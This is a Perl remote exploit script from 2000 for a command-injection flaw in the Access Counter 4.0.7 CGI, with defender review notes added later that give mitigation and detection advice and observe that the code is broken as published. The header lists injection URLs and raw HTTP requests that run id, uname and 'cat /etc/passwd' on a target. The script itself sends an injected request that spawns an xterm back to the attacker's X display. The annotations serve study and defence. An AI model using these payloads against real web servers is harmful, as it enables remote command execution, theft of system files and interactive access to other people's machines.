#!/usr/bin/perl
#
# access-counter.pl
# George Burgyan's Access Counter version 4.0.7 Remote Exploit
# Coded by slash <tcsh@b0f.i-p.com>
#
# Advisory by Howard Kash
#
# The popular CGI web page access counter version 4.0.7 by George
# Burgyan allows execution of arbitrary commands due to unchecked
# user input. Commands are executed with the same privilege as
# the web server. Of course, other exploits can be used to get
# root access on an unpatched OS.
#
# The counter consists of a perl script called "counter", and
# multiple links to counter called counter-ord, counterfiglet,
# counterfiglet-ord, counterbanner, and counterbanner-ord. The
# following examples illustrate how they can be exploited:
#
# Using straight URL
# ------------------
# http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
#
# Passing commands in a variable
# ------------------------------
# > telnet web-server www
# GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
# X: pwd;ls -la /etc;cat /etc/passwd
#
# > telnet web-server www
# GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
# X: echo;id;uname -a;w
#
# The counter was last updated in 1995, so it is probably no longer
# supported. Links and email addresses referenced in the source
# code are no longer valid. However, it appears to still be widely
# used based on the number of references returned by search engine
# queries.
#
# Usage: [slash@linux]# ./access-counter.pl <Victim> <YourIP> <Display>
#
# You may try to change the path to the script, if this one isn't working
#
# Greetz go to Scrippie, Mixter, HWA, MDMA, mad 7350 releases !!! 
# and all the people who know me. Special greet goes to venglin !

use IO::Socket;

# --- Review notes (defender's perspective) ---------------------------------
# This file is a historical exploit artifact for the command-injection bug
# described in the header: the counter CGI does not check its request-path
# input, and the examples above show shell separators (";") after "f="
# being honoured, so arbitrary commands run as the web-server user.
# Mitigation: remove or replace the counter CGI (per the header it has been
# unmaintained since 1995); failing that, reject any path component that is
# not a strictly allowlisted token, and run CGI under a low-privilege
# account. Detection: the GET line sent below is the part that typically
# lands in ordinary access logs (requests to the counter scripts named in
# the header whose path contains ";"), whereas the command itself travels
# in a custom "X:" request header, so full-request logging or a WAF rule is
# needed to see it. The code is kept byte-identical: it has no
# "use strict"/"use warnings", and (see the two notes below) it is not
# runnable as published.
# ---------------------------------------------------------------------------

# Positional arguments: target host, the operator's own address, and an X
# display number; the last two are later joined as "$attacker:$display".
$host = $ARGV[0];
$attacker = $ARGV[1];
$display = $ARGV[2];
# Path of the vulnerable CGI on the target (sibling links are listed in the header).
$cgi = "/cgi-bin/counterfiglet/nc";
# Seconds to idle after sending the request before tearing everything down.
$wait = 5;

print "Access Counter version 4.0.7 Remote Exploit\n";
print "Coded by slash <tcsh@b0f.i-p.com> \n";
print "Usage: $0  <Victim> <YourIP> <Display> \n";


# Weak check: an unanchored /\d/ only requires that $display contain a digit
# somewhere; it does not establish that the whole value is a number.
if ($display !~ /\d/) {
    print("Display value has to be a number\n");
    exit(1);
}

print "Trying to connect to $host...";
# NOTE(review): $port is never assigned anywhere in this file, so PeerPort is
# undef here and the connect cannot succeed as published. Left unrepaired.
$socket = IO::Socket::INET->
            new(Proto=>"tcp", 
            PeerAddr=>$host, 
            PeerPort=>$port) 
            || die "Connection failed.\n";

# Grants $host access to the operator's own X server. $host comes straight
# from @ARGV and is interpolated into a shell command string, so this line
# is itself shell-injectable on the machine running the script.
system("xhost + $host");

print "Trying to spawm xterm from $host to $attacker:$display...\n";
# NOTE(review): the double quotes inside this string are unbalanced, so the
# file does not compile as published. Left unrepaired. The line is the
# injection vector: a ";" in the CGI path after "f=", with the command body
# carried in the "X:" header written next (the technique the header describes).
print $socket "GET $cgi/f=;sh%20-c%20"$HTTP_X" HTTP/1.0\n";
print $socket "X: xterm -ut -display $attacker:$display\n";

print "Waiting...";
# Idle for $wait seconds, printing a dot per second, before the socket and
# the xhost grant are withdrawn.
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}
# Revokes the xhost grant made above; only reached if nothing died earlier.
system("xhost - $host");
close($socket);
print "\nFinished spawning xterm.\n";

# EOF
#                   www.hack.co.za   [7 September 2000]#
